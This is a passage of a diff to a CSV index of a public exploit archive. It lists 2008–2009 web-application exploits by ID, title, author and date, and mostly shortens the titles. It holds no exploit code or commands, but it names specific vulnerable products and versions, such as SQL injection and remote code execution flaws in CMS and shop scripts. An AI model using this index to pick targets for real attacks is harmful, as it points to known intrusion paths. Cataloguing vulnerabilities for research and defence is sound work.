Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,php,webapps,0 7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0 -7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 +7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -20215,21 +20218,21 @@ id,file,description,date,author,platform,type,port 7433,platforms/php/webapps/7433.txt,"Social Groupie - 'group_index.php id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0 -7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 +7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 -7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 +7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0 -7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 +7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0 -7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery / Edit File) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 +7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,php,webapps,0 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 -7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 +7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 @@ -20240,7 +20243,7 @@ id,file,description,date,author,platform,type,port 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 -7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,XaDoS,php,webapps,0 +7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,php,webapps,0 7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0 7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 @@ -20258,7 +20261,7 @@ id,file,description,date,author,platform,type,port 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps,0 7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title' SQL Injection",2008-12-15,ZoRLu,php,webapps,0 7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0 -7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 +7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 @@ -20266,7 +20269,7 @@ id,file,description,date,author,platform,type,port 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0 -7494,platforms/php/webapps/7494.txt,"Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0 +7494,platforms/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,php,webapps,0 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps,0 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps,0 @@ -20296,12 +20299,12 @@ id,file,description,date,author,platform,type,port 7529,platforms/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 -7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 +7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 7538,platforms/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 -7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 +7540,platforms/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News - 'news.php pid' SQL Injection",2008-12-22,Piker,php,webapps,0 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0 @@ -20323,7 +20326,7 @@ id,file,description,date,author,platform,type,port 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - (thread.php id) SQL Injection",2008-12-23,Samir-M,php,webapps,0 7567,platforms/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - 'id' Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla! Component com_allhotels - 'id' Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 -7569,platforms/php/webapps/7569.txt,"doop CMS 1.4.0b - (Cross-Site Request Forgery / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0 +7569,platforms/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,php,webapps,0 7570,platforms/php/webapps/7570.txt,"ILIAS 3.7.4 - (ref_id) Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 7572,platforms/php/webapps/7572.txt,"Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 7573,platforms/php/webapps/7573.txt,"Joomla! Component Live Ticker 1.0 - (tid) Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 @@ -20377,7 +20380,7 @@ id,file,description,date,author,platform,type,port 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 -7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 +7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0 7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Authentication Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 @@ -20396,7 +20399,7 @@ id,file,description,date,author,platform,type,port 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0 7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0 -7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 +7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0 7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0 @@ -20441,7 +20444,7 @@ id,file,description,date,author,platform,type,port 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0 7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0 7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0 -7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 +7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps,0 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 7767,platforms/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 @@ -20474,8 +20477,8 @@ id,file,description,date,author,platform,type,port 7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7805,platforms/php/webapps/7805.txt,"rankem - (File Disclosure / Cross-Site Scripting / cm) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 -7806,platforms/php/webapps/7806.txt,"blogit! - (SQL Injection / File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 +7805,platforms/php/webapps/7805.txt,"rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0 +7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0 7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 @@ -20531,7 +20534,7 @@ id,file,description,date,author,platform,type,port 7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 -7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-01-28,Encrypt3d.M!nd,php,webapps,0 +7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0 @@ -20548,13 +20551,13 @@ id,file,description,date,author,platform,type,port 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 -7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 +7925,platforms/php/webapps/7925.txt,"revou twitter clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 -7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 +7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 -7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 +7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 @@ -20565,7 +20568,7 @@ id,file,description,date,author,platform,type,port 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,php,webapps,0 7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps,0 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit)",2009-02-02,LSO,php,webapps,0 -18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 +18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 @@ -20587,13 +20590,13 @@ id,file,description,date,author,platform,type,port 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion",2009-02-04,make0day,php,webapps,0 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion",2009-02-04,Osirys,php,webapps,0 -7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 -7982,platforms/asp/webapps/7982.txt,"team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 +7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 +7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 -7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 +7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0 -7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 +7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 @@ -20602,7 +20605,7 @@ id,file,description,date,author,platform,type,port 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0 -8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 +8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 @@ -20611,8 +20614,8 @@ id,file,description,date,author,platform,type,port 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 -8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - (Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 -8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 +8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 +8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 - (09.01.22) Cross-Site Scripting",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 @@ -20631,22 +20634,22 @@ id,file,description,date,author,platform,type,port 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 -8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 +8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0 8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection",2009-02-11,Osirys,php,webapps,0 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - (searchmatch.php) SQL Injection",2009-02-11,nuclear,php,webapps,0 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 -8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple 